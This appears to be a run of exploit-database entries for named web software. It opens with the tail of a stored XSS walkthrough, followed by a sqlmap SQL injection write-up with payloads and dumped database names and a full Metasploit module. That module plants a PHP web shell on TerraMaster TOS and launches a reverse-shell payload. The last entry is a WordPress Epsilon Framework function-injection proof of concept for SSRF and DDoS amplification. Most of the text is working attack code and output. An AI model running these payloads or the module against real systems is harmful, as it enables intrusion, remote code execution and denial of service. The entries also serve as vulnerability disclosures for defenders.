:http(s)://<host>/admin/students.php} (b). Under "Add Student" in the "First Name" field, use XSS payload '"><script>alert("students")</script>' as the name of new course (Also fill the respective sections if required). [ Note : The XSS can also be triggered if we put the same payload in "Last Name" field ] (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Students", your XSS Payloads will be triggered. [+] Step 2.6 (a). Click on "Teachers" page. {Uri :http(s)://<host>/admin/teachers.php} (b). Under "Add Student" in the "First Name" field, use XSS payload '"><script>alert("students")</script>' as the name of new course (Also fill the respective sections if required). [ Note : The XSS can also be triggered if we put the same payload in "Last Name" field ] (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Teachers", your XSS Payloads will be triggered. [+] Step 3. This should trigger the XSS payload and anytime you click on respective pages, your stored XSS payloads will be triggered.

# Exploit Title: Online Learning Management System 1.0 - 'id' SQL Injection # Exploit Author: Aakash Madaan (Godsky) # Date: 2020-12-22 # Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Departments" page. Step 3. Choose any event and select "edit". The url should be "http(s)://<host>/admin/edit_department.php?id=4" Step 4. Capture the request to the "edit" event page in burpsuite. Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=4' AND (SELECT 7775 FROM (SELECT(SLEEP(5)))vwwE) AND 'OoVY'='OoVY Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-9296' UNION ALL SELECT NULL,NULL,CONCAT(0x716a707871,0x64766351487955536b5276427a5a416a764e6a4b46476a57704f6d73425368544153494e53525970,0x716a716a71)-- - --- [16:01:08] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [16:01:08] [INFO] fetching database names [16:01:12] [INFO] retrieved: 'information_schema' [16:01:13] [INFO] retrieved: 'mysql' [16:01:15] [INFO] retrieved: 'performance_schema' [16:01:16] [INFO] retrieved: 'css' [16:01:18] [INFO] retrieved: 'sales_inventory_db' [16:01:19] [INFO] retrieved: 'rios_db' [16:01:19] [INFO] retrieved: 'capstone' available databases [7]: [*] capstone [*] css [*] information_schema [*] mysql [*] performance_schema [*] rios_db [*] sales_inventory_db Step 6. Sqlmap should inject the web-app successfully which leads to information disclosure

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => "TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution", 'Description' => %q( This module exploits a unauthenticated command execution vulnerability in TerraMaster TOS. The "Event" parameter in "include/makecvs.php" contains a vulnerability. "filename" is executing command on system during ".csv" creation. In order to do this, it is not necessary to have a session in the application. Therefore an unathenticated user can execute the command on the system. ), 'License' => MSF_LICENSE, 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>', #PoC & Metasploit module 'IHTeam' # Discovery ], 'References' => [ ['CVE', '2020-'], ['URL', 'http://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html'], ['URL', 'https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/'] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [['Automatic', {}]], 'Privileged' => false, 'DisclosureDate' => "Dec 12 2020", 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8181, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_perl' })) register_options( [ OptString.new('TARGETURI', [true, "Base ERP directory path", '/']) ] ) end def run_cmd(file,cmd) res = send_request_cgi( { 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, "#{file}"), 'data' => "cmd=#{cmd}" }) end def upload_shell sname = Rex::Text.rand_text_alpha_lower(8) + ".php" payload_post = "http|echo \"<?php echo(passthru(\\$_REQUEST['cmd']));?>\" >> /usr/www/#{sname} && chmod +x /usr/www/#{sname}||" @b64p = Rex::Text.encode_base64(payload.encoded) perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"' payload = Rex::Text.uri_encode(perl_payload) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "include", "makecvs.php"), 'vars_get' => { 'Event' => "#{payload_post}", } ) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "#{sname}"), 'vars_post' => { 'cmd' => 'id' } ) if res && res.code == 200 && res.body.include?('uid=') print_good("Upload completed successfully and command executed!") run_cmd("#{sname}",payload) else fail_with(Failure::NoAccess, 'Error occurred during uploading!') end end def exploit unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end upload_shell end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "version"), ) if res && res.code == 200 && res.body version = res.body.split(".0_")[1] print_status("Version : " + res.body) return CheckCode::Detected if version.nil? version = version.split(".").join('') if version <= "4206" return CheckCode::Vulnerable else return CheckCode::Safe end end end end

# Exploit Title: Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection # Date: 22/12/2020 # Exploit Authors: gx1 <g.per45[at]gmail.com> lotar <Giuseppe.DiTerlizzi[at]nttdata.com> # Vendor Homepage: https://wordpress.com/ # Software Link: https://github.com/WordPress/WordPress # Affected Themes: shapely - Fixed in version 1.2.9 newsmag - Fixed in version 2.4.2 activello - Fixed in version 1.4.2 illdy - Fixed in version 2.1.7 allegiant - Fixed in version 1.2.6 newspaper-x - Fixed in version 1.3.2 pixova-lite - Fixed in version 2.0.7 brilliance - Fixed in version 1.3.0 medzone-lite - Fixed in version 1.2.6 regina-lite - Fixed in version 2.0.6 transcend - Fixed in version 1.2.0 affluent - Fixed in version 1.1.2 bonkers - Fixed in version 1.0.6 antreas - Fixed in version 1.0.7 naturemag-lite - No known fix # Tested on: Wordpress 5.6 # CVE : N/A # References: - https://wpscan.com/vulnerability/10417 - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/ - https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/ - https://developer.wordpress.org/reference/classes/requests/request_multiple/ Description: Fifteen WordPress themes use a vulnerable version of epsilon-framework that vulnerable to a critical unauthenticated function injection vulnerability, due to the lack of capability and CSRF nonce checks in AJAX actions. Technical Details: The vulnerability is present in epsilon_framework_ajax_action AJAX action that is accessible to all users, authenticated or not. The function takes three POST user input, assign them to the $class, $method and $args variables and calls the class with arguments: ================================================================ public function epsilon_framework_ajax_action() { if ( 'epsilon_framework_ajax_action' !== $_POST['action'] ) { wp_die( json_encode( array( 'status' => false, 'error' => 'Not allowed', ) ) ); } if ( count( $_POST['args']['action'] ) !== 2 ) { wp_die( json_encode( array( 'status' => false, 'error' => 'Not allowed', ) ) ); } if ( ! class_exists( $_POST['args']['action'][0] ) ) { wp_die( json_encode( array( 'status' => false, 'error' => 'Class does not exist', ) ) ); } $class = $_POST['args']['action'][0]; $method = $_POST['args']['action'][1]; $args = $_POST['args']['args']; $response = $class::$method( $args ); ================================================================ Nonce is checked only if it set. As it is possible to observe, the vulnerability can be exploited if the attacker is able to use a class that contains a public static method that accept an array argument. Useful methods should be investigated in the context of the targeted website, because they could depend by the installed plugins and themes. On a wordpress instance, it is possible to store the list of classes containing public static methods by adding this code in epsilon_framework_ajax_action function: ================================================================ function testClasses() { error_log("[+] IN TEST CLASSES"); mkdir("/tmp/classes"); foreach(get_declared_classes() as $c) { mylog($c); $f = fopen('/tmp/classes/'.$c, 'w'); $reflection = new ReflectionClass($c); $staticMethods = $reflection->getMethods(ReflectionMethod::IS_STATIC); foreach($staticMethods as $sm) { mylog($sm); fwrite($f, $sm . "\n"); } fclose($f); } } testClasses(); =============================================================== We have found Requests::request_multiple static method(array $requests) in the core of Wordpress that can be used to send arbitrary HTTP requests, with critical dangerous effects for the vulnerable target. Proof Of Concept: The following code: =============================================================== <html> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script> $(document).ready(function(){ console.log("document ready"); var ajax_url = "<vulnerable-wordpress-ip>/wp-admin/admin-ajax.php" var data = { 'action': 'epsilon_framework_ajax_action', 'args': { 'action': ["Requests", "request_multiple"], 'args' : [{"url": "<poc-website>"}] } } $.post(ajax_url, data, function(response) { console.log("in response") }); }); </script> </html> =============================================================== sends a request to <poc-request>: ============================================================================================================================== <vulnerable-wordpress-ip>- - [22/Dec/2020:18:36:51 +0000] "GET / HTTP/1.1" 200 3898 "<poc-website>" "php-requests/1.7-3470169" ============================================================================================================================== Impacts: 1. DDOS amplification against a target: the attacker can exploit vulnerable wordpress sites to send ajax requests with args array containing multiple occurrences of the target. In this way, he can perform an amplification attack against a target website. var data = { 'action': 'epsilon_framework_ajax_action', 'args': { 'action': ["Requests", "request_multiple"], 'args' : [{"url": "<target>"}, {"url": "<target>"}, {"url": "<target>"}, ...] } } 2. SSRF: the attacker can exploit Requests::request_multiple method to perform a Server-Side Request Forgery and obtain access to internal network through vulnerable Wordpress site. 3. Wordpress DoS: if the attacker creates a specific POST request that contains a request to "/wp-admin/admin-ajax.php" as data he could be able to create an internal loop that crashes Wordpress site. Solution: In Affected Themes we show the fixed versions.